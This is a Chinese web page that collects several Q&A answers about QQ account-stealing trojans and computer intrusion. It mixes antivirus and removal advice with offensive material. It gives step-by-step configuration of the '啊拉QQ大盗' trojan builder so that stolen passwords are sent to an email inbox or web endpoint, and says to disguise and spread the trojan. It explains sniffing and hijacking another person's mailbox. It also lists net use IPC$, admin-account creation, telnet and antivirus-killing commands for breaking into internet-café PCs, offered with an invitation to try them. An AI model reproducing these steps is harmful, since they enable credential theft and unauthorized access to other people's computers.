电脑里有盗号木马怎么办?
可以用QQKav来查杀,如果还杀不掉的话,建议把病毒加在QQKav的开机杀毒里面并保存重启启动计算机即可,启动的过程中QQKav会自动将病毒文件清除。并仰制病毒再生。
现在哪个杀毒软件可靠?家用,爱玩游戏,防被盗号,被黑短时间控制电脑,昨天才被黑了
我在用腾讯电脑管家,电脑管家能够快速全面地检查计算机存在的风险,检查项目主要包括木马、高危系统漏洞、垃圾文件、系统配置被破坏及篡改等。发现风险后,通过电脑管家提供的修复和优化操作,能够消除风险和优化计算机的性能。电脑管家建议您每周体检一次,这样可以大大降低被木马入侵的风险。
求科普下,目前黑客盗号的手段有哪几种,又该如何防范号被盗?
盗号有这几种:
钓鱼软件,钓鱼网站,键盘监控,key,站在你旁边看你输密码。
预防方法就是不要接陌生人的软件或者打开陌生人发的网站。电脑要开启防火墙,并安装金山毒霸或QQ电脑管家(个人认为这2种好用)。在网吧输入密码要注意旁边有没有人在盯着你的键盘,有的话就不用输了,输入就是自讨苦吃
如何防止盗号?
很多朋友都有过QQ号被盗的经历,即使用“密码保护”功能找回来后,里面的Q币也已经被盗号者洗劫一空,碰到更恶毒的盗号者,还会将你的好友统统删除,朋友们将会永远得离开你。想过反击吗?什么,反击?别开玩笑了,我们只是菜鸟,不是黑客,我们只会看看网页,聊聊天,连QQ号是怎么被盗的都不知道,还能把盗号者怎么样呢?其实喜欢盗号的所谓“黑客”们,也只是利用了一些现成的盗号工具,只要我们了解了QQ号被盗的过程,就能作出相应防范,甚至由守转攻,给盗号者以致命一击。
一、知己知彼,盗号技术不再神秘
如今,还在持续更新的QQ盗号软件已经所剩无几,其中最为著名,流传最广的则非“啊拉QQ大盗”莫属,目前绝大多数的QQ号被盗事件都是由这个软件引起的。软件的使用条件很简单,只要你有一个支持smtp发信的邮箱或者一个支持asp脚本的网页空间即可。而且该木马可以将盗取的QQ号自动分为靓号和非靓号两种,并将它们分别发送到不同的信箱中,这也是“啊拉QQ大盗”如此流行的原因之一。接下来,便让我们先来了解一下其工作原理,以便从中找到反击的良方。
1、选择盗号模式
下载“啊拉QQ大盗”,解压后有两个文件:alaqq.exe、爱永恒,爱保姆qq.asp。其中alaqq.exe是“啊拉QQ大盗”的配置程序,爱永恒,爱保姆qq.asp是使用“网站收信”模式时需使用的文件。正式使用之前,还需要设置其参数。
“邮箱收信”配置:运行alaqq.exe,出现程序的配置界面。在“发信模式选择”选项中选中“邮箱收信”,在“邮箱收信”填写电子邮箱地址(建议使用程序默认的163.com网易的邮箱)。这里以邮箱n12345@163.com(密码n_12345)为例来介绍“邮箱收信”模式时的配置,并进行下文中的测试。此外,在“收信箱(靓)”和“收信箱(普)”中可以填入不同的邮箱地址用来接受QQ靓号和普通QQ号。然后在“发信服务器”下拉框中选择自己邮箱相应的smtp服务器,这里是smtp.163.com。最后填入发信箱的帐号、密码、全称即可。
设置完毕后,我们可以来测试一下填写的内容是否正确,点击下方“测试邮箱”按钮,程序将会出现邮箱测试状态。如果测试的项目都显示成功,即可完成邮箱信息配置。
“网站收信”配置:除了选择“邮箱收信”模式之外,我们还可以选择“网站收信”模式,让盗取的QQ号码自动上传到指定的网站空间。当然,在使用之前,也需要做一些准备工作。
用FTP软件将爱永恒,爱保姆qq.asp上传支持ASP脚本的空间,运行alaqq.exe,在“Asp接口地址”中输入爱永恒,爱保姆qq.asp所在的URL地址,那么,当木马截获QQ号码信息后,就会将其保存于爱永恒,爱保姆qq.asp同目录下的qq.txt文件中。
2、设置木马附加参数
接下来我们进行高级设置。如果勾选“运行后关闭QQ”,对方一旦运行“啊拉QQ大盗”生成的木马,QQ将会在60秒后自动关闭,当对方再次登录QQ后,其QQ号码和密码会被木马所截获,并发送到盗号者的邮箱或网站空间中。此外,如果希望该木马被用于网吧环境,那就需要勾选“还原精灵自动转存”,以便系统重起后仍能运行木马。除这两项外,其他保持默认即可。
3、盗取QQ号码信息
配置完“啊拉QQ大盗”,点击程序界面中的“生成木马”,即可生成一个能盗取QQ号码的木马程序。我们可以将该程序伪装成图片、小游戏,或者和其他软件捆绑后进行传播。当有人运行相应的文件后,木马会隐藏到系统中,当系统中有QQ登录时,木马便会开始工作,将相关的号码及密码截取,并按照此前的设置,将这些信息发送到邮箱或者网站空间。
二、练就慧眼,让木马在系统中无处可逃
现在,我们已经了解了“啊拉QQ大盗”的一般流程,那么如何才能从系统中发现“啊拉QQ大盗”呢?一般来说,如果碰到了以下几种情况,那就应该小心了。
·QQ自动关闭。
·运行某一程序后其自身消失不见。
·运行某一程序后杀毒软件自动关闭。
·访问杀毒软件网站时浏览器被自动关闭。
·如果杀毒软件有邮件监控功能的,出现程序发送邮件的警告框。
·安装有网络防火墙(例如天网防火墙),出现NTdhcp.exe访问网络的警告。
出现上述情况的一种或多种,系统就有可能已经感染了“啊拉QQ大盗”。当然,感染了木马并不可怕,我们同样可以将其从系统中清除出去。
1、手工查杀木马。发现系统感染了“啊拉QQ大盗”后我们可以手工将其清除。“啊拉QQ大盗”运行后会在系统目录中的system32文件夹下生成一个名为NTdhcp.exe的文件,并在注册表的启动项中加入木马的键值,以便每次系统启动都能运行木马。我们首先要做的就是运行“任务管理器”,结束其中的木马进程“NTdhcp.exe”。然后打开资源管理器中的“文件夹选项”,选择其中的“查看”标签,将其中“隐藏受保护的操作系统文件”选项前面的勾去掉。接着进入系统目录中的system32文件夹,将NTdhcp.exe文件删除。最后进入注册表删除NTdhcp.exe键值,该键值位于HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentversionRun。
2、卸载木马。卸载“啊拉QQ大盗”很简单,只要下载“啊拉QQ大盗”的配置程序,运行后点击其中的“卸载程序”按钮即可将木马完全清除出系统。
三、以退为进,给盗号者以致命一击
忙乎了半天,终于把系统中的“啊拉QQ大盗”彻底清除,那么,面对可恶的盗号者,我们是不是应该给他一个教训呢?
1、利用漏洞,由守转攻
这里所谓的“攻”,并不是直接入侵盗号者的电脑,相信这种“技术活”并不适合大家。这里只是从盗号软件几乎都存在的漏洞入手,从而给盗号者一个教训。
那么这个漏洞是什么呢?
从此前对“啊拉QQ大盗”的分析中可以看到,配置部分填写了收取QQ号码信息邮件的邮箱帐号和密码,而邮箱的帐号和密码都是明文保存在木马程序中的。因此,我们可以从生成的木马程序中找到盗号者的邮箱帐号和密码。进而轻松控制盗号者的邮箱,让盗号者偷鸡不成反蚀把米。
提示:以上漏洞仅存在于将QQ号码信息以邮件发送方式的木马,如果在配置“啊拉QQ大盗”的过程中选择使用网站接收的方式则不存在该漏洞。
2、网络嗅探,反夺盗号者邮箱
当木马截取到QQ号码和密码后,会将这些信息以电子邮件的形式发送到盗号者的邮箱,我们可以从这里入手,在木马发送邮件的过程中将网络数据包截取下来,这个被截获的数据包中就含有盗号者邮箱的帐号和密码。截取数据包时我们可以使用一些网络嗅探软件,这些嗅探软件可以很轻松得截取数据包并自动过滤出密码信息。
·x-sniff
x-sniff是一款命令行下的嗅探工具,嗅探能力十分强大,尤其适合嗅探数据包中的密码信息。
将下载下来的x-sniff解压到某个目录中,例如“c:“,然后运行”命令提示符“,在”命令提示符“中进入x-sniff所在的目录,然后输入命令”xsiff.exe-pass-hide-logpass.log“即可(命令含义:在后台运行x-sniff,从数据包中过滤出密码信息,并将嗅探到的密码信息保存到同目录下的pass.log文件中)。
嗅探软件设置完毕,我们就可以正常登录QQ。此时,木马也开始运行起来,但由于我们已经运行x-sniff,木马发出的信息都将被截取。稍等片刻后,进入x-sniff所在的文件夹,打开pass.log,便可以发现x-sniff已经成功嗅探到邮箱的帐户和密码。
·sinffer
可能很多朋友对命令行下的东西都有一种恐惧感,所以我们可以使用图形化的嗅探工具来进行嗅探。例如适合新手使用的sinffer。
运行sinffer之前,我们需要安装WinPcap驱动,否则sinffer将不能正常运行。
运行sinffer。首先我们需要为sinffer.exe指定一块网卡,点击工具栏上的网卡图标,在弹出的窗口中选择自己使用的网卡,点”OK“后即可完成配置。确定以上配置后,点击sinffer工具栏中的”开始“按钮,软件即开始了嗅探工作。
接下来,我们正常登陆QQ,如果嗅探成功,就会在sinffer的界面中出现捕获的数据包,其中邮箱帐号密码信息被很清晰得罗列了出来。
得到盗号者的邮箱帐号和密码以后,我们可以将其中的QQ号码信息邮件全部删除,或者修改他的邮箱密码,给盗号者一个教训,让我们菜鸟也正义一把。
我的电脑中了盗号木马,怎样才能彻底清除
我建议你用NOD32 去试下,现在一般的电脑上面都有木马,但是,就是不知道木马厉害程度而已! 你把硬盘格式化后,然后重装系统,你可以装好系统后,先不要装杀毒软件,先把你WINDOWS里面的regedit.exe这个文件 和windwos下面的有个 system32下面的有一个文件cmd.exe 分别把这两个文件做备份,让他每次开机就自动还原! 用services.msc这个命令打开服务,把不该要的服务都关掉! 其实还有一个办法很好,你把你C盘的桌面文件全部存放在D盘下面,然后,用个还原精灵把C盘保护起来,至少你的系统盘重病毒机率不大!
尤其注意一点,在每次安装软件的时候,安装过程当中有的有插件,你就不要勾选上了!
希望你能够解决问题!
黑客攻击你的电脑步骤
兄弟,虽然你说的第一个我不太明白你说什么。
你说用记事本编写恶意代码,这个高科技我还真第一次听。
发生也得有发生的步骤,
第二个,编写盗号代码,用什么编写,是编写软件还是代码?
就算可以编写相关盗号软件,也需要一个入侵的步骤,
好比我需要入侵你的电脑,用IP类入侵,第一我需要寻找你的IP,然后采取扫描方式扫描漏洞。
溢出类的,口令类的,一般家庭电脑不存在这么低级的漏洞,如果你真的运气那么好,是05年之前装的系统 又没有打过补丁的话,那么你也就幸运了。
IP类入侵,在个人电脑基本上行不通,网马也是一样,一般经常打补丁的 IE也不会存在这些漏洞。所以一般入侵着采取社工,社工看你个人意识,如果你意识防护高,不接受别人发你的东西,不随便下载不知名的东西,一般别人是攻击不了你的。
包括最容易攻击的 DOOS 一旦别人知道你的IP 给你发送垃圾数据包 导致你电脑网速下降。
个人电脑 一般是很容易防止的,一旦端口网络 从新连接,可更换一个新的IP,这样他对你的攻击也是没效的,当然 他会在寻找你的iP 一般寻找的方法在于QQ 给你发送截图 获得IP地址。
只要你把他拉黑了 他联系不了你 也就找不到你的IP 坏人永远都是不能得逞的。
黑客没有你想象的那么厉害,那么神秘,黑客的背后,也只不过是一个普通人。
开心黑客网-----有你更精彩!
如何黑电脑
首先要确定要入侵电脑的IP,关于IP,网吧的编号和IP地址通常是相同或高一位,比如编号为
20的电脑,IP一般是192.168.0.20或192.168.0.21… 要是上贴吧匿名发帖子的话,也会
看见IP地址…
有了IP地址后,就可以连接那将被你入侵的倒霉电脑了,一般登陆电脑的用户名多是“user编号”
的形式空密码形式,所以在“命令提示符”下输入net use //IP地址/ipc$""/user:""及
net use //IP地址/ipc$""/user:"user编号"命令进行连接
连接成功后必须关闭对方电脑的杀毒软件,右击“我的电脑”,选择“管理”在弹出窗口中右击
“计算机管理(本地)”,选择“连接另一台计算机”,连接至那台倒霉电脑的IP号,启动
“Tenlet”服务
然后在“命令提示符”下输入两条命令在本机新建user20用户并将它添加到管理员组。
net user user编号/add
net localgroup administators user编号/add
然后进入C:\Winnt\System32,右击CMD.EXE,选择“创建快捷方式”,然后右击快捷方式,选择
“属性”,选择“以其他用户身份运行”,运行快捷方式CMD,弹出“以其他用户身份运行”窗
口后,输入“user编号”回车
用telnet 电脑IP编号 登陆至那个倒霉孩子的电脑,再从网上下载一个命令行下杀进程的软件,
比如说knlps等,在telnet上将杀毒软件进程关闭
这样就OK了
做你想做的事吧……,呵呵…,有兴趣的…试试
黑客已经成为一种文化,很多人想成为黑客,他们偶尔学到了几种小花招,总喜欢拿别人开玩笑,搞些恶作剧。其实黑客的最高境界在于防守,不在于进攻。所谓明枪易躲暗箭难防,要防住他人所有的进攻,肯定需要懂得比对方更多的系统知识,了解更多的系统漏洞,及如何弥补漏洞。 现在满天都是黑客教程,但真正有用的不多,下面介绍一种WIN9X下的入侵方法:
1.取得对方IP地址如XX.XX.XX.XX,方法太多不细讲了。
2.判断对方上网的地点,开个DOS窗口键入 TRACERT XX.XX.XX.XX 第4和第5行反映的信息既是对方的上网地点。
3.得到对方电脑的名称,开个DOS窗口键入 NBTSTAT -A XX.XX.XX.XX 第一行是对方电脑名称 第二行是对方电脑所在工作组 第三行是对方电脑的说明
4.在Windows目录下有一文件名为LMHOSTS.SAM,将其改名为LMHOSTS,删除其内容,将对方的IP及电脑名按以下格式写入文件: XX.XX.XX.XX 电脑名
5.开DOS窗口键入 NBTSTAT -R
6.在开始-查找-电脑中输入对方电脑名,出现对方电脑点击即可进入。